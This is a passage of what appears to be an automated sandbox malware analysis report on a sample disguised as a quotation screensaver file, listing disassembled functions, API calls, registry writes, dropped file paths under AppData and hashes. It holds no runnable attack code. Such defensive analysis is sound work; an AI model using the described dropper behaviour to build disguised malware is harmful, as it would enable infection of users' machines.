                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                                  • Opcode ID: b64ca7e6414ee6bbf5da50448a3027ef8d4ba463d4e3383e6ca23f3e6ee4dffe
                                                                                                                  • Instruction ID: 0c8a0e89caf5568db8901e27ffaf3810bf6506f96032679f6f12c630495f4213
                                                                                                                  • Opcode Fuzzy Hash: b64ca7e6414ee6bbf5da50448a3027ef8d4ba463d4e3383e6ca23f3e6ee4dffe
                                                                                                                  • Instruction Fuzzy Hash: A0F021706402096BDF159BA4DD0DFFB375CAB08308F14047AA58BF20D1EA78D9358BAD
                                                                                                                  Function 6D43176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 679 6d43176b-6d4317a7 call 6d431b28 683 6d4318c4-6d4318c6 679->683 684 6d4317ad-6d4317b1 679->684 685 6d4317b3-6d4317b9 call 6d43233f 684->685 686 6d4317ba-6d4317c7 call 6d432381 684->686 685->686 691 6d4317f7-6d4317fe 686->691 692 6d4317c9-6d4317ce 686->692 693 6d431800-6d43181c call 6d432568 call 6d4315e9 call 6d4312f6 GlobalFree 691->693 694 6d43181e-6d431822 691->694 695 6d4317d0-6d4317d1 692->695 696 6d4317e9-6d4317ec 692->696 719 6d431873-6d431877 693->719 697 6d431824-6d43186a call 6d4315fb call 6d432568 694->697 698 6d43186c-6d431872 call 6d432568 694->698 701 6d4317d3-6d4317d4 695->701 702 6d4317d9-6d4317da call 6d432ac8 695->702 696->691 699 6d4317ee-6d4317ef call 6d432d53 696->699 697->719 698->719 713 6d4317f4 699->713 708 6d4317e1-6d4317e7 call 6d432742 701->708 709 6d4317d6-6d4317d7 701->709 710 6d4317df 702->710 718 6d4317f6 708->718 709->691 709->702 710->713 713->718 718->691 723 6d4318b4-6d4318bb 719->723 724 6d431879-6d431887 call 6d43252e 719->724 723->683 726 6d4318bd-6d4318be GlobalFree 723->726 729 6d431889-6d43188c 724->729 730 6d43189f-6d4318a6 724->730 726->683 729->730 731 6d43188e-6d431896 729->731 730->723 732 6d4318a8-6d4318b3 call 6d431572 730->732 731->730 733 6d431898-6d431899 FreeLibrary 731->733 732->723 733->730
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431D99
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431D9E
                                                                                                                    • Part of subcall function 6D431B28: GlobalFree.KERNEL32(?), ref: 6D431DA3
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431816
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6D431899
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4318BE
                                                                                                                    • Part of subcall function 6D43233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6D432370
                                                                                                                    • Part of subcall function 6D432742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6D4317E7,00000000), ref: 6D432812
                                                                                                                    • Part of subcall function 6D4315FB: wsprintfA.USER32 ref: 6D431629
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3962662361-3916222277
                                                                                                                  • Opcode ID: 17b3fafe83ed7b5dea9d9e5c249de0f27e0c1cdff247164aa4f7f16ff1e654eb
                                                                                                                  • Instruction ID: 1000758750c57c9bd173d8b43622d9cf0aef46d74bd94f568c76e70df3394053
                                                                                                                  • Opcode Fuzzy Hash: 17b3fafe83ed7b5dea9d9e5c249de0f27e0c1cdff247164aa4f7f16ff1e654eb
                                                                                                                  • Instruction Fuzzy Hash: 9841AF714042269BDF14EF6E88C4FAA37A8BF0D318F178428EA599A186DF74CD45C7E0
                                                                                                                  Function 00402483 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 736 402483-4024b4 call 402c3e * 2 call 402cce 743 402aca-402ad9 736->743 744 4024ba-4024c4 736->744 746 4024d4-4024d7 744->746 747 4024c6-4024d3 call 402c3e lstrlenA 744->747 748 4024d9-4024ed call 402c1c 746->748 749 4024ee-4024f1 746->749 747->746 748->749 753 402502-402516 RegSetValueExA 749->753 754 4024f3-4024fd call 403202 749->754 758 402518 753->758 759 40251b-4025f8 RegCloseKey 753->759 754->753 758->759 759->743
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000023,00000011,00000002), ref: 004024CE
                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 0040250E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8284.tmp,00000000,00000011,00000002), ref: 004025F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi8284.tmp
                                                                                                                  • API String ID: 2655323295-1599890453
                                                                                                                  • Opcode ID: 075dcd9b7ed6697882eaf92a84f5b4600832515cf9f3e663d48b6914d9a7a16e
                                                                                                                  • Instruction ID: 88f15d61a2940aad8ed10c9ef44c82fdaed33bedda869503174587a0488ef463
                                                                                                                  • Opcode Fuzzy Hash: 075dcd9b7ed6697882eaf92a84f5b4600832515cf9f3e663d48b6914d9a7a16e
                                                                                                                  • Instruction Fuzzy Hash: D9119371E04208BFEB10AFA5CE89AAE7A74EB50318F21443FF505F71D1C6B84D819B28
                                                                                                                  Function 00405F60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 761 405f60-405f6a 762 405f6b-405f96 GetTickCount GetTempFileNameA 761->762 763 405fa5-405fa7 762->763 764 405f98-405f9a 762->764 766 405f9f-405fa2 763->766 764->762 765 405f9c 764->765 765->766
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F74
                                                                                                                  • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004034CF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008), ref: 00405F8E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                  • API String ID: 1716503409-944333549
                                                                                                                  • Opcode ID: 59e4d82f83d66f91c7d94536a43c00adebbc3ab435809a879064da4cd0aebbcc
                                                                                                                  • Instruction ID: 11265cd33c2c0bb82ae9e1d512a052bfe205841745ab1289e9aa7ad4b405873d
                                                                                                                  • Opcode Fuzzy Hash: 59e4d82f83d66f91c7d94536a43c00adebbc3ab435809a879064da4cd0aebbcc
                                                                                                                  • Instruction Fuzzy Hash: A5F0A7363046047BEB118F59ED04B9B7B9DDF91750F10803BFA44DB180D6B4D9548799
                                                                                                                  Function 004020AA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 767 4020aa-4020b6 768 402171-402173 767->768 769 4020bc-4020d2 call 402c3e * 2 767->769 770 4022ea-4022ef call 401423 768->770 779 4020e1-4020ef LoadLibraryExA 769->779 780 4020d4-4020df GetModuleHandleA 769->780 776 402aca-402ad9 770->776 782 4020f1-4020fe GetProcAddress 779->782 783 40216a-40216c 779->783 780->779 780->782 784 402100-402106 782->784 785 40213d-402142 call 4054e2 782->785 783->770 786 402108-402114 call 401423 784->786 787 40211f-402136 call 6d43176b 784->787 790 402147-40214a 785->790 786->790 797 402116-40211d 786->797 792 402138-40213b 787->792 790->776 793 402150-402158 call 403b47 790->793 792->790 793->776 798 40215e-402165 FreeLibrary 793->798 797->790 798->776
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020D5
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020E5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020F5
                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040215F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2987980305-0
                                                                                                                  • Opcode ID: 3f32cf49bad49edea3ad9d9521b4e658a38a7b8071471fd334d35f4c2d9664b6
                                                                                                                  • Instruction ID: 0a1e4ae9d659db48c9407a732e8ae10bdefbce987148e8ea452b7ac7d9209d69
                                                                                                                  • Opcode Fuzzy Hash: 3f32cf49bad49edea3ad9d9521b4e658a38a7b8071471fd334d35f4c2d9664b6
                                                                                                                  • Instruction Fuzzy Hash: 2521EE31A00114ABCF206FA5CF49B7E7570AF40359F34413BF611B51D1CBBC49829A6E
                                                                                                                  Function 004015C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(?,?,00421D58,0000000C,00405E35,00421D58,00421D58,76273410,?,76272EE0,00405B80,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405DD7
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(00000000), ref: 00405DDC
                                                                                                                    • Part of subcall function 00405DC9: CharNextA.USER32(00000000), ref: 00405DF0
                                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                    • Part of subcall function 004059A8: CreateDirectoryA.KERNELBASE(?,?), ref: 004059EA
                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines,00000000,00000000,000000F0), ref: 00401641
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines, xrefs: 00401636
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines
                                                                                                                  • API String ID: 1892508949-4275992298
                                                                                                                  • Opcode ID: 865653c710f981e9a07bb9be47e977c003820f0a6b66fd43be10398a5dc74df2
                                                                                                                  • Instruction ID: 81a32c142541d3720e23d046207a6f367e1f6b184a933223c5313c75e145d648
                                                                                                                  • Opcode Fuzzy Hash: 865653c710f981e9a07bb9be47e977c003820f0a6b66fd43be10398a5dc74df2
                                                                                                                  • Instruction Fuzzy Hash: 5A1104316082449BDB317FA54D4167F26B09E92365B2C493FE592B22E2DA3D09429A3E
                                                                                                                  Function 00406285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406543,80000002), ref: 004062CB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00406543,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 004062D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID: Call
                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                  • Instruction ID: 57dd79c3921f1dbc77e83a882a9fc4cf510c753d81bb9b52363b6a1565bcf257
                                                                                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                  • Instruction Fuzzy Hash: 54019A72100209AACF229F60DC09FDB3FA8EF45364F01407AFA16A2190D278C964DBA4
                                                                                                                  Function 00406EEF Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aeb6faab35e0f2ee2ff3ab9083724de3724ad850bc240ca7fc011da89c5ccfe7
                                                                                                                  • Instruction ID: 72526039bc12bc242e54f96750081513bb184ab31d67c606a7fe176210857fa5
                                                                                                                  • Opcode Fuzzy Hash: aeb6faab35e0f2ee2ff3ab9083724de3724ad850bc240ca7fc011da89c5ccfe7
                                                                                                                  • Instruction Fuzzy Hash: 0CA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                                                  Function 004070F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bb82a9fc00301a6b362e92cfbe2e3433d5e4fc79326dd60a28fed78605e9db73
                                                                                                                  • Instruction ID: 2685d3c3bf2747a443544b1b67df1b5286aab810b79f45576ff8f88686c927f1
                                                                                                                  • Opcode Fuzzy Hash: bb82a9fc00301a6b362e92cfbe2e3433d5e4fc79326dd60a28fed78605e9db73
                                                                                                                  • Instruction Fuzzy Hash: 64912070E04228CBDF28CFA8C8547ADBBB1FB45305F14816ED856BB281D7786A86DF45
                                                                                                                  Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dba442ac619f3961234dad68aa596345e2dacb187a870399513d827d2b21800d
                                                                                                                  • Instruction ID: f429e235db9acde414311ca2fe3ea501167cc900d3a75f29da939f5519f19d54
                                                                                                                  • Opcode Fuzzy Hash: dba442ac619f3961234dad68aa596345e2dacb187a870399513d827d2b21800d
                                                                                                                  • Instruction Fuzzy Hash: D4814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A986DF45
                                                                                                                  Function 0040690B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
